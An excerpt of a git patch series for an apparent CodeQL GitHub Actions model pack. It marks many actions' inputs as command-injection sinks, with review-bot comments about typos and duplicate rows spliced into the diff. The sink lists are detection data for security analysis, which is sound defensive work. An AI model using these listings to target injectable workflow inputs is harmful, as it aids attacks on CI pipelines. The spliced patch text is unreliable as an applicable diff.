+ - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files", "manual"]
diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml
index 1946b78f5fd3..8e4938368b8c 100644
--- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files"]
+ - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files", "manual"]
diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml
index 77706e266fed..61141e5f73ba 100644
--- a/ql/lib/ext/trilom_file-changes-action.model.yml
+++ b/ql/lib/ext/trilom_file-changes-action.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["trilom/file-changes-action", "*", "output.files", "PR changed files"]
- - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files"]
- - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files"]
- - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files"]
+ - ["trilom/file-changes-action", "*", "output.files", "PR changed files", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files", "manual"]
diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
index 3072c6f54fd3..ae166b1f5154 100644
--- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml
+++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
@@ -3,13 +3,13 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection"]
- - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection"]
- - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection"]
- - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection"]
- - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection"]
- - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection"]
- - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection"]
- - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection"]
- - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection"]
- - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection"]
\ No newline at end of file
+ - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection", "manual"]
+ - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
index 5fe53ea3d079..a6cc68843895 100644
--- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml
+++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection"]
- - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection"]
+ - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"]
+ - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"]
diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml
index d4b083e14d22..c80590e49315 100644
--- a/ql/lib/ext/tzkhan_pr-update-action.model.yml
+++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tzkhan/pr-update-action", "*", "output.headMatch", ""]
+ - ["tzkhan/pr-update-action", "*", "output.headMatch", "", "manual"]
diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml
index 5e87f6c3b941..a352d6c9ff61 100644
--- a/ql/lib/ext/veracode_veracode-sca.model.yml
+++ b/ql/lib/ext/veracode_veracode-sca.model.yml
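Review bot: The last tripss/conventional-changelog-action sink row still carries a stray apostrophe in the input name, `"input.tag-prefix'"`, so it names an input that presumably does not exist on the action and the real `tag-prefix` input is never matched as a command-injection sink. Since every row in this file is rewritten here anyway, this is the place to correct it: `- ["tripss/conventional-changelog-action", "*", "input.tag-prefix", "command-injection", "manual"]`. The typo is inherited from the removed line rather than introduced by this commit, and the file also still ends without a trailing newline.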
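Review bot: The tzkhan/pr-update-action source row keeps an empty string in the kind column (`"output.headMatch", ""`) while the other source models in this change use a descriptive kind such as `"PR changed files"`. If the sourceModel predicate filters or classifies on that column, an empty kind may silently drop or misclassify this source, so it is worth confirming what the library does with `""` and giving the row a real kind if one is required. The same empty kind appears in both xt0rted/slash-command-action rows in a later file section of this commit.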
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["veracode/veracode-sca", "*", "input.url", "command-injection"]
- - ["veracode/veracode-sca", "*", "input.path", "command-injection"]
- - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection"]
- - ["veracode/veracode-sca", "*", "input.url", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"]
+ - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"]
+ - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection", "manual"]
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"]
diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml
index dbe5d2d542dd..6ed71f182151 100644
--- a/ql/lib/ext/wearerequired_lint-action.model.yml
+++ b/ql/lib/ext/wearerequired_lint-action.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["wearerequired/lint-action", "*", "input.git_name", "command-injection"]
- - ["wearerequired/lint-action", "*", "input.git_email", "command-injection"]
- - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection"]
+ - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"]
+ - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"]
+ - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection", "manual"]
diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml
index 9ecbdb6329f5..5864c0d0ede0 100644
--- a/ql/lib/ext/webfactory_ssh-agent.model.yml
+++ b/ql/lib/ext/webfactory_ssh-agent.model.yml
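Review bot: The veracode/veracode-sca hunk still lists `input.url` twice (first and fourth rows), so one of the two new rows is a pure duplicate; either drop the fourth row or, if a different input was meant, name it. Extensible-predicate data is relational, so the duplicate should be harmless at evaluation time, but it reads as a copy-paste slip and leaves it unclear whether an input is missing from the model. The xt0rted/slash-command-action hunk in the next file section has the same duplication of `output.command-arguments`.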
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection"]
- - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection"]
- - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection"]
+ - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"]
+ - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"]
+ - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection", "manual"]
diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml
index 31a1eb5bde91..2a4378d17126 100644
--- a/ql/lib/ext/xt0rted_slash-command-action.model.yml
+++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""]
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"]
diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml
index 10920eb6bf59..880b0d606da2 100644
--- a/ql/lib/ext/zaproxy_action-baseline.model.yml
+++ b/ql/lib/ext/zaproxy_action-baseline.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection"]
- - ["zaproxy/action-baseline", "*", "input.target", "command-injection"]
- - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection"]
- - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection"]
\ No newline at end of file
+ - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"]
+ - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"]
+ - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection", "manual"]
+ - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml
index a1d49af08456..fd8172c6ca84 100644
--- a/ql/lib/ext/zaproxy_action-full-scan.model.yml
+++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection"]
- - ["zaproxy/action-full-scan", "*", "input.target", "command-injection"]
- - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection"]
- - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection"]
+ - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"]
+ - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"]
+ - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection", "manual"]
+ - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection", "manual"]
From ae84303facb7861d6d40fc994d2cd4b7f938faee Mon Sep 17 00:00:00 2001
From: jorgectf Date: Thu, 11 Apr 2024 11:25:23 +0200 Subject: [PATCH 163/707] Add models for composite actions sinks --- ...ctions_actions-runner-controller.model.yml | 14 ++++++++++++ .../composite-actions/adap_flower.model.yml | 9 ++++++++ .../agoric_agoric-sdk.model.yml | 11 ++++++++++ .../airbnb_lottie-ios.model.yml | 6 +++++ .../airbytehq_airbyte.model.yml | 7 ++++++ .../amazon-ion_ion-java.model.yml | 7 ++++++ .../composite-actions/anchore_grype.model.yml | 6 +++++ .../composite-actions/anchore_syft.model.yml | 6 +++++ .../angular_dev-infra.model.yml | 10 +++++++++ .../ansible_ansible-lint.model.yml | 7 ++++++ .../composite-actions/ansible_awx.model.yml | 7 ++++++ .../apache_arrow-datafusion.model.yml | 6 +++++ .../apache_arrow-rs.model.yml | 7 ++++++ .../composite-actions/apache_arrow.model.yml | 6 +++++ .../apache_bookkeeper.model.yml | 6 +++++ .../composite-actions/apache_brpc.model.yml | 6 +++++ .../apache_camel-k.model.yml | 17 ++++++++++++++ .../composite-actions/apache_camel.model.yml | 11 ++++++++++ .../composite-actions/apache_flink.model.yml | 10 +++++++++ .../composite-actions/apache_nuttx.model.yml | 8 +++++++ .../apache_opendal.model.yml | 9 ++++++++ .../composite-actions/apache_pekko.model.yml | 6 +++++ .../apache_pulsar-helm-chart.model.yml | 12 ++++++++++ .../apache_superset.model.yml | 6 +++++ .../appflowy-io_appflowy.model.yml | 7 ++++++ .../aptos-labs_aptos-core.model.yml | 8 +++++++ .../archivesspace_archivesspace.model.yml | 6 +++++ .../armadaproject_armada.model.yml | 6 +++++ .../composite-actions/armbian_build.model.yml | 14 ++++++++++++ .../auth0_auth0-java.model.yml | 9 ++++++++ .../auth0_auth0.net.model.yml | 8 +++++++ .../auth0_auth0.swift.model.yml | 6 +++++ .../autogluon_autogluon.model.yml | 10 +++++++++ .../composite-actions/avaiga_taipy.model.yml | 6 +++++ .../aws-amplify_amplify-cli.model.yml | 6 +++++ .../aws_amazon-vpc-cni-k8s.model.yml | 7 ++++++ .../aws_karpenter-provider-aws.model.yml | 7 ++++++ 
.../awslabs_amazon-eks-ami.model.yml | 12 ++++++++++ .../awslabs_aws-lambda-rust-runtime.model.yml | 6 +++++ .../azerothcore_azerothcore-wotlk.model.yml | 7 ++++++ .../azure_azure-datafactory.model.yml | 7 ++++++ .../badges_shields.model.yml | 6 +++++ .../balena-io_etcher.model.yml | 6 +++++ .../balena-os_balena-engine.model.yml | 6 +++++ .../ben-manes_caffeine.model.yml | 10 +++++++++ .../composite-actions/bokeh_bokeh.model.yml | 6 +++++ .../botpress_botpress.model.yml | 6 +++++ ...intree_braintree-android-drop-in.model.yml | 8 +++++++ .../braintree_braintree_android.model.yml | 9 ++++++++ .../broadinstitute_gatk.model.yml | 8 +++++++ .../canonical_multipass.model.yml | 7 ++++++ .../chia-network_actions.model.yml | 11 ++++++++++ .../chia-network_chia-blockchain.model.yml | 6 +++++ .../chipsalliance_chisel.model.yml | 7 ++++++ .../chocobozzz_peertube.model.yml | 7 ++++++ .../cilium_cilium-cli.model.yml | 12 ++++++++++ .../composite-actions/cilium_cilium.model.yml | 8 +++++++ .../citusdata_citus.model.yml | 8 +++++++ .../clerk_javascript.model.yml | 10 +++++++++ .../cloud-custodian_cloud-custodian.model.yml | 9 ++++++++ .../cloudflare_workers-sdk.model.yml | 6 +++++ ...cloudfoundry_cloud_controller_ng.model.yml | 6 +++++ .../composite-actions/coder_coder.model.yml | 6 +++++ .../composite-actions/coil-kt_coil.model.yml | 6 +++++ .../commaai_openpilot.model.yml | 8 +++++++ .../conan-io_conan-center-index.model.yml | 7 ++++++ .../corretto_corretto-8.model.yml | 9 ++++++++ .../cosmos_cosmos-sdk.model.yml | 6 +++++ .../composite-actions/coturn_coturn.model.yml | 6 +++++ .../crunchydata_postgres-operator.model.yml | 6 +++++ .../composite-actions/cvc5_cvc5.model.yml | 15 +++++++++++++ .../composite-actions/d2l-ai_d2l-en.model.yml | 9 ++++++++ ...build-check-deploy-gradle-action.model.yml | 12 ++++++++++ .../datadog_dd-trace-dotnet.model.yml | 10 +++++++++ .../datadog_dd-trace-go.model.yml | 9 ++++++++ .../datadog_dd-trace-js.model.yml | 7 ++++++ 
.../datafuselabs_databend.model.yml | 7 ++++++ .../davatorium_rofi.model.yml | 8 +++++++ .../debezium_debezium.model.yml | 6 +++++ .../defenseunicorns_zarf.model.yml | 6 +++++ ...lifiees_demarches-simplifiees.fr.model.yml | 6 +++++ ...of-veterans-affairs_vets-website.model.yml | 6 +++++ .../devexpress_devextreme.model.yml | 8 +++++++ .../diggerhq_digger.model.yml | 9 ++++++++ .../diku-dk_futhark.model.yml | 7 ++++++ .../discourse_.github.model.yml | 6 +++++ .../dnsjava_dnsjava.model.yml | 8 +++++++ .../dotintent_react-native-ble-plx.model.yml | 6 +++++ .../dotnet_docs-tools.model.yml | 6 +++++ .../dotnet_dotnet-monitor.model.yml | 6 +++++ .../dragonflydb_dragonfly.model.yml | 9 ++++++++ .../eksctl-io_eksctl.model.yml | 8 +++++++ .../elastic_apm-agent-dotnet.model.yml | 7 ++++++ .../elastic_apm-agent-java.model.yml | 10 +++++++++ .../elementor_elementor.model.yml | 13 +++++++++++ .../composite-actions/emberjs_data.model.yml | 6 +++++ .../composite-actions/emqx_emqx.model.yml | 8 +++++++ .../eonasdan_tempus-dominus.model.yml | 7 ++++++ .../composite-actions/erlang_otp.model.yml | 7 ++++++ .../esphome_esphome.model.yml | 8 +++++++ .../composite-actions/expensify_app.model.yml | 14 ++++++++++++ .../composite-actions/expo_expo.model.yml | 6 +++++ .../expo_vscode-expo.model.yml | 8 +++++++ ...xternal-secrets_external-secrets.model.yml | 7 ++++++ .../facebook_buck2.model.yml | 6 +++++ .../composite-actions/facebook_flow.model.yml | 6 +++++ .../composite-actions/facebook_yoga.model.yml | 7 ++++++ .../facebookresearch_xformers.model.yml | 10 +++++++++ .../fastly_compute-actions.model.yml | 6 +++++ .../composite-actions/felangel_bloc.model.yml | 9 ++++++++ .../firebase_firebase-ios-sdk.model.yml | 9 ++++++++ .../flaxengine_flaxengine.model.yml | 6 +++++ ...pperdevices_flipperzero-firmware.model.yml | 10 +++++++++ .../composite-actions/fluxcd_flux2.model.yml | 8 +++++++ .../forcedotcom_salesforcedx-vscode.model.yml | 6 +++++ .../fossasia_visdom.model.yml | 7 ++++++ 
.../freckle_stack-action.model.yml | 6 +++++ .../freeradius_freeradius-server.model.yml | 8 +++++++ .../composite-actions/gaphor_gaphor.model.yml | 7 ++++++ .../getsentry_action-release.model.yml | 6 +++++ .../github_codeql-action.model.yml | 10 +++++++++ .../composite-actions/github_ruby.model.yml | 10 +++++++++ .../gittools_gitversion.model.yml | 8 +++++++ .../go-spatial_tegola.model.yml | 7 ++++++ .../goauthentik_authentik.model.yml | 6 +++++ .../godotengine_godot.model.yml | 9 ++++++++ .../composite-actions/google_dagger.model.yml | 6 +++++ .../googleapis_java-cloud-bom.model.yml | 6 +++++ .../googleapis_sdk-platform-java.model.yml | 6 +++++ ...ooglecloudplatform_magic-modules.model.yml | 6 +++++ .../gravitational_teleport.model.yml | 10 +++++++++ .../grote_transportr.model.yml | 6 +++++ .../hashicorp_nomad.model.yml | 6 +++++ .../hashicorp_terraform.model.yml | 10 +++++++++ .../hashicorp_vault.model.yml | 7 ++++++ .../home-assistant_android.model.yml | 8 +++++++ .../homebrew_actions.model.yml | 14 ++++++++++++ ...erledger_aries-cloudagent-python.model.yml | 6 +++++ .../hyperledger_fabric-samples.model.yml | 8 +++++++ .../igniterealtime_openfire.model.yml | 8 +++++++ .../infracost_actions.model.yml | 6 +++++ ...nspektor-gadget_inspektor-gadget.model.yml | 18 +++++++++++++++ .../intel-analytics_ipex-llm.model.yml | 6 +++++ .../ionic-team_ionic-framework.model.yml | 16 ++++++++++++++ .../ionic-team_ionicons.model.yml | 14 ++++++++++++ .../ionic-team_stencil.model.yml | 11 ++++++++++ .../composite-actions/ipfs_aegir.model.yml | 9 ++++++++ .../jetbrains_jetbrainsruntime.model.yml | 6 +++++ .../jhipster_generator-jhipster.model.yml | 22 +++++++++++++++++++ .../jsocol_django-ratelimit.model.yml | 6 +++++ .../juicedata_juicefs.model.yml | 12 ++++++++++ .../jupyter_docker-stacks.model.yml | 8 +++++++ .../keycloak_keycloak.model.yml | 8 +++++++ .../composite-actions/kserve_kserve.model.yml | 8 +++++++ .../kubeflow_katib.model.yml | 10 +++++++++ 
.../kubeflow_training-operator.model.yml | 6 +++++ .../kubernetes-sigs_karpenter.model.yml | 6 +++++ .../kubernetes-sigs_kwok.model.yml | 6 +++++ .../kubescape_kubescape.model.yml | 7 ++++++ .../kubeshop_botkube.model.yml | 7 ++++++ .../kyverno_kyverno.model.yml | 8 +++++++ .../composite-actions/lancedb_lance.model.yml | 9 ++++++++ .../launchdarkly_ios-client-sdk.model.yml | 6 +++++ .../layer5labs_meshmap-snapshot.model.yml | 11 ++++++++++ .../ldc-developers_ldc.model.yml | 15 +++++++++++++ .../ledgerhq_ledger-live.model.yml | 8 +++++++ .../composite-actions/lerna_lerna.model.yml | 6 +++++ .../composite-actions/lf-edge_eve.model.yml | 8 +++++++ .../libgit2_libgit2.model.yml | 12 ++++++++++ .../lightning-ai_pytorch-lightning.model.yml | 13 +++++++++++ .../lightning-ai_torchmetrics.model.yml | 8 +++++++ .../linkerd_linkerd2.model.yml | 9 ++++++++ .../logseq_publish-spa.model.yml | 9 ++++++++ .../macvim-dev_macvim.model.yml | 7 ++++++ .../mamba-org_mamba.model.yml | 8 +++++++ .../maplibre_maplibre-native.model.yml | 16 ++++++++++++++ .../mastodon_mastodon.model.yml | 6 +++++ .../mavlink_qgroundcontrol.model.yml | 8 +++++++ .../mdanalysis_mdanalysis.model.yml | 13 +++++++++++ .../medic_cht-core.model.yml | 8 +++++++ .../medusajs_medusa.model.yml | 8 +++++++ .../metabase_metabase.model.yml | 17 ++++++++++++++ ...etamask_action-create-release-pr.model.yml | 8 +++++++ .../metamask_action-npm-publish.model.yml | 6 +++++ .../microsoft_fluentui.model.yml | 6 +++++ .../microsoft_playwright.model.yml | 11 ++++++++++ .../composite-actions/microsoft_wsl.model.yml | 7 ++++++ .../milvus-io_milvus.model.yml | 6 +++++ .../composite-actions/mlflow_mlflow.model.yml | 6 +++++ .../modin-project_modin.model.yml | 8 +++++++ .../mozilla_addons-server.model.yml | 7 ++++++ .../mozilla_bedrock.model.yml | 6 +++++ .../mozilla_sccache.model.yml | 6 +++++ .../msys2_setup-msys2.model.yml | 6 +++++ .../mumble-voip_mumble.model.yml | 8 +++++++ .../composite-actions/nasa_fprime.model.yml | 6 +++++ 
.../nats-io_nats-server.model.yml | 8 +++++++ ..._optic-release-automation-action.model.yml | 8 +++++++ .../composite-actions/nektos_act.model.yml | 12 ++++++++++ ...4j-contrib_neo4j-apoc-procedures.model.yml | 7 ++++++ .../neondatabase_neon.model.yml | 13 +++++++++++ .../composite-actions/neovim_neovim.model.yml | 6 +++++ .../composite-actions/nhost_nhost.model.yml | 6 +++++ .../nix-community_nixos-wsl.model.yml | 7 ++++++ .../composite-actions/novuhq_novu.model.yml | 6 +++++ .../composite-actions/nymtech_nym.model.yml | 6 +++++ .../obsproject_obs-studio.model.yml | 19 ++++++++++++++++ .../composite-actions/ocaml_dune.model.yml | 10 +++++++++ .../oneflow-inc_oneflow.model.yml | 12 ++++++++++ ...metry_opentelemetry-ruby-contrib.model.yml | 8 +++++++ ...pen-telemetry_opentelemetry-ruby.model.yml | 7 ++++++ .../open-watcom_open-watcom-v2.model.yml | 8 +++++++ .../openapitools_openapi-generator.model.yml | 8 +++++++ .../composite-actions/openjdk_jdk.model.yml | 6 +++++ ...pensearch-project_opensearch-net.model.yml | 8 +++++++ .../opensearch-project_security.model.yml | 6 +++++ .../opentrons_opentrons.model.yml | 12 ++++++++++ .../openvinotoolkit_openvino.model.yml | 16 ++++++++++++++ ...enzeppelin-contracts-upgradeable.model.yml | 12 ++++++++++ ...nzeppelin_openzeppelin-contracts.model.yml | 12 ++++++++++ .../composite-actions/oppia_oppia.model.yml | 6 +++++ .../composite-actions/oracle_graal.model.yml | 7 ++++++ .../oracle_truffleruby.model.yml | 6 +++++ .../orhun_git-cliff.model.yml | 6 +++++ .../composite-actions/oven-sh_bun.model.yml | 7 ++++++ .../owntracks_android.model.yml | 7 ++++++ .../pandas-dev_pandas.model.yml | 8 +++++++ .../pardeike_harmony.model.yml | 9 ++++++++ .../pennylaneai_pennylane.model.yml | 7 ++++++ .../phalcon_cphalcon.model.yml | 13 +++++++++++ .../philosowaffle_peloton-to-garmin.model.yml | 7 ++++++ .../composite-actions/php_php-src.model.yml | 10 +++++++++ .../phpdocumentor_phpdocumentor.model.yml | 7 ++++++ 
...necone-io_pinecone-python-client.model.yml | 10 +++++++++ .../composite-actions/pixijs_pixijs.model.yml | 6 +++++ .../posthog_posthog.model.yml | 7 ++++++ .../composite-actions/primer_react.model.yml | 7 ++++++ .../project-chip_connectedhomeip.model.yml | 8 +++++++ .../projectnessie_nessie.model.yml | 9 ++++++++ .../composite-actions/psf_black.model.yml | 6 +++++ .../pyca_cryptography.model.yml | 6 +++++ .../pyg-team_pytorch_geometric.model.yml | 8 +++++++ .../python-poetry_poetry.model.yml | 6 +++++ .../composite-actions/python_mypy.model.yml | 7 ++++++ .../quarto-dev_quarto-cli.model.yml | 15 +++++++++++++ .../composite-actions/quay_clair.model.yml | 11 ++++++++++ .../quickwit-oss_quickwit.model.yml | 7 ++++++ .../composite-actions/r-lib_actions.model.yml | 18 +++++++++++++++ .../randombit_botan.model.yml | 7 ++++++ .../raspberrypi_documentation.model.yml | 12 ++++++++++ .../ray-project_kuberay.model.yml | 6 +++++ .../readthedocs_actions.model.yml | 10 +++++++++ .../reflex-dev_reflex.model.yml | 6 +++++ .../renovatebot_renovate.model.yml | 6 +++++ .../rethinkdb_rethinkdb.model.yml | 9 ++++++++ .../composite-actions/risc0_risc0.model.yml | 9 ++++++++ .../rocketchat_rocket.chat.model.yml | 9 ++++++++ .../composite-actions/rook_rook.model.yml | 9 ++++++++ .../composite-actions/roots_trellis.model.yml | 6 +++++ .../composite-actions/ruby_debug.model.yml | 6 +++++ .../composite-actions/ruby_ruby.model.yml | 10 +++++++++ .../composite-actions/rusefi_rusefi.model.yml | 10 +++++++++ .../saltstack_salt.model.yml | 14 ++++++++++++ .../sap_sapmachine.model.yml | 6 +++++ .../scala-native_scala-native.model.yml | 7 ++++++ .../composite-actions/scitools_iris.model.yml | 8 +++++++ .../scylladb_scylla-operator.model.yml | 9 ++++++++ .../shader-slang_slang.model.yml | 10 +++++++++ .../shaka-project_shaka-player.model.yml | 9 ++++++++ ...ode_react-webpack-rails-tutorial.model.yml | 7 ++++++ .../simple-icons_simple-icons.model.yml | 6 +++++ .../slint-ui_slint.model.yml | 7 
++++++ .../solidusio_solidus.model.yml | 9 ++++++++ .../composite-actions/solo-io_gloo.model.yml | 6 +++++ .../composite-actions/sonarr_sonarr.model.yml | 12 ++++++++++ .../sonic-pi-net_sonic-pi.model.yml | 8 +++++++ .../spacedriveapp_spacedrive.model.yml | 6 +++++ .../spockframework_spock.model.yml | 6 +++++ .../spring-io_initializr.model.yml | 7 ++++++ .../spring-io_start.spring.io.model.yml | 7 ++++++ .../spring-projects_spring-boot.model.yml | 7 ++++++ ...spring-projects_spring-framework.model.yml | 7 ++++++ .../spring-projects_spring-graphql.model.yml | 7 ++++++ .../square_workflow-kotlin.model.yml | 8 +++++++ .../stefanprodan_podinfo.model.yml | 7 ++++++ .../composite-actions/stellar_go.model.yml | 6 +++++ .../streetsidesoftware_cspell.model.yml | 6 +++++ .../subquery_subql.model.yml | 6 +++++ .../swagger-api_swagger-codegen.model.yml | 11 ++++++++++ .../swagger-api_swagger-parser.model.yml | 11 ++++++++++ .../tarantool_tarantool.model.yml | 9 ++++++++ .../telepresenceio_telepresence.model.yml | 6 +++++ .../tensorflow_datasets.model.yml | 7 ++++++ .../texstudio-org_texstudio.model.yml | 6 +++++ .../toeverything_affine.model.yml | 13 +++++++++++ .../treeverse_lakefs.model.yml | 8 +++++++ .../trezor_trezor-firmware.model.yml | 9 ++++++++ .../tribler_tribler.model.yml | 10 +++++++++ .../trunk-io_trunk-action.model.yml | 13 +++++++++++ .../composite-actions/unidata_metpy.model.yml | 6 +++++ .../unstructured-io_unstructured.model.yml | 6 +++++ .../composite-actions/vercel_turbo.model.yml | 6 +++++ .../vesoft-inc_nebula.model.yml | 12 ++++++++++ .../composite-actions/vkcom_vkui.model.yml | 11 ++++++++++ .../vuetifyjs_vuetify.model.yml | 9 ++++++++ .../wagoodman_dive.model.yml | 6 +++++ ...lletconnect_walletconnectswiftv2.model.yml | 13 +++++++++++ .../composite-actions/wazuh_wazuh.model.yml | 8 +++++++ .../web-infra-dev_rspack.model.yml | 8 +++++++ .../webassembly_wabt.model.yml | 6 +++++ .../composite-actions/wntrblm_nox.model.yml | 6 +++++ 
